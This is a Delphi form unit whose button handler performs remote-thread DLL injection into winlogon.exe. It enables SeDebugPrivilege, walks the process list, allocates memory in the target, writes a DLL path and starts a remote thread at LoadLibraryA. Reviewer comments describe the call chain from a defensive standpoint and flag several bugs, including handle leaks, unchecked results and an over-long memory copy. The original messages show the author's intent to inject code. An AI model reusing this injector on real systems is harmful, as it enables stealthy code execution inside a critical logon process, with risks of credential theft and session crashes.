unit Unit2;

// Form unit with a single button handler. On click it enables SeDebugPrivilege
// on the current process token, walks the process list with the Toolhelp32
// snapshot API and, for the process named 'winlogon.exe', allocates a block in
// that process, writes a DLL path into it and starts a remote thread at
// LoadLibraryA so the DLL is loaded there (remote-thread DLL injection).
// From a defensive standpoint the whole sequence -- privilege adjustment,
// PROCESS_ALL_ACCESS to a system process, VirtualAllocEx / WriteProcessMemory /
// CreateRemoteThread pointing at LoadLibraryA -- is the call chain that
// endpoint monitoring commonly alerts on, and winlogon.exe is a process whose
// crash logs the user out, so any fault in the injected DLL has session-wide
// impact.

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls,Tlhelp32;  // Tlhelp32: CreateToolhelp32Snapshot / Process32First / Process32Next

type
  TForm2 = class(TForm)
    Button1: TButton;
    // Button handler; see the unit header comment for what it does end to end.
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form2: TForm2;

implementation

{$R *.dfm}

const
  // Privilege name passed to LookupPrivilegeValue.
  SE_DEBUG_NAME='SeDebugPrivilege';
const
  // Size of the remote allocation AND of the WriteProcessMemory copy below.
  BlockSize = $200;

procedure TForm2.Button1Click(Sender: TObject);
var
  hSnapHandle:THandle;            // Toolhelp32 snapshot; never closed in this routine
  lpProcE:TProcessEntry32;
  hToken:THandle;                 // current process token
  sedebugnameValue:TLargeInteger; // LUID filled by LookupPrivilegeValue
  tkp, ptkpPrev:TOKEN_PRIVILEGES;
  bRet:Boolean;
  ulRet:ULONG;
  _handleWL:THandle;              // unused
  _exitCode:DWORD;                // unused
  procHandle : THandle;           // opened for every enumerated process
  RemoteTID : Cardinal;
  BaseAddress : pointer;          // remote allocation returned by VirtualAllocEx
  BytesWritten : Cardinal;
  ADLL:String;                    // path written into the remote process
begin
  // --- Step 1: enable SeDebugPrivilege on our own token -------------------
  // NOTE(review): a failed OpenProcessToken only shows a message; execution
  // continues with an unset hToken into LookupPrivilegeValue/AdjustTokenPrivileges.
  if not OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) then
    ShowMessage('problem...');
  bRet:=LookupPrivilegeValue( Nil, SE_DEBUG_NAME, sedebugnameValue);
  // NOTE(review): on lookup failure the token is closed here but the routine
  // still falls through to AdjustTokenPrivileges and a second CloseHandle(hToken).
  if not bRet then
    CloseHandle(hToken);
  tkp.PrivilegeCount:= 1;
  tkp.Privileges[0].Luid:=sedebugnameValue;
  tkp.Privileges[0].Attributes:=SE_PRIVILEGE_ENABLED;
  ptkpPrev:=tkp;
  // '&tkp' is the Delphi escaped identifier, i.e. the same variable as tkp.
  // bRet is assigned but never inspected, so the privilege may silently remain
  // disabled and every later OpenProcess on a protected process would fail.
  bRet:=AdjustTokenPrivileges(hToken,FALSE,&tkp,sizeof(TOKEN_PRIVILEGES),ptkpPrev,ulRet);
  CloseHandle(hToken);

  // --- Step 2: enumerate processes --------------------------------------
  hSnapHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
  if hSnapHandle<>0 then begin
    // Process32First only checks that the snapshot is readable; its entry is
    // discarded because the loop starts with Process32Next (first process skipped).
    if Process32First(hSnapHandle, lpProcE)=true then begin
      while Process32Next(hSnapHandle, lpProcE) do begin
        // A PROCESS_ALL_ACCESS handle is requested for EVERY process before the
        // name check; handles for non-matching processes are never closed (leak).
        procHandle := OpenProcess(PROCESS_ALL_ACCESS, FALSE, lpProcE.th32ProcessID);
        // Exact, case-sensitive match on the executable name.
        if lpProcE.szExeFile='winlogon.exe' then begin
          ShowMessage('Sad cu injectovat kod!!! 
:P');
          ADLL:='c:\moj_dll1.dll';
          // Each Exit below leaves the routine with hSnapHandle still open.
          If procHandle = 0 Then Exit;
          // --- Step 3: allocate, write the path, start LoadLibraryA remotely ---
          BaseAddress := VirtualAllocEx(procHandle, nil, BlockSize, MEM_COMMIT, PAGE_READWRITE);
          If BaseAddress = nil Then Begin ShowMessage('Sranje!'); CloseHandle(procHandle); Exit; End;
          // NOTE(review): BlockSize ($200) bytes are copied from @ADLL[1], but ADLL
          // holds far fewer characters, so the copy reads past the string's buffer.
          If (not WriteProcessMemory(procHandle, BaseAddress, @ADLL[1], BlockSize, BytesWritten)) or (BytesWritten<>BlockSize) Then Begin ShowMessage('Nece..'); CloseHandle(procHandle); Exit; End;
          // Thread entry point is kernel32!LoadLibraryA with BaseAddress (the
          // path) as its argument. The returned thread handle is discarded and
          // the result is not checked.
          CreateRemoteThread(procHandle, nil, 0, GetProcAddress(GetModuleHandle(kernel32), 'LoadLibraryA'), BaseAddress, 0,RemoteTID);
          CloseHandle(procHandle);
        end;
      end;
    end;
  end;
end;

end.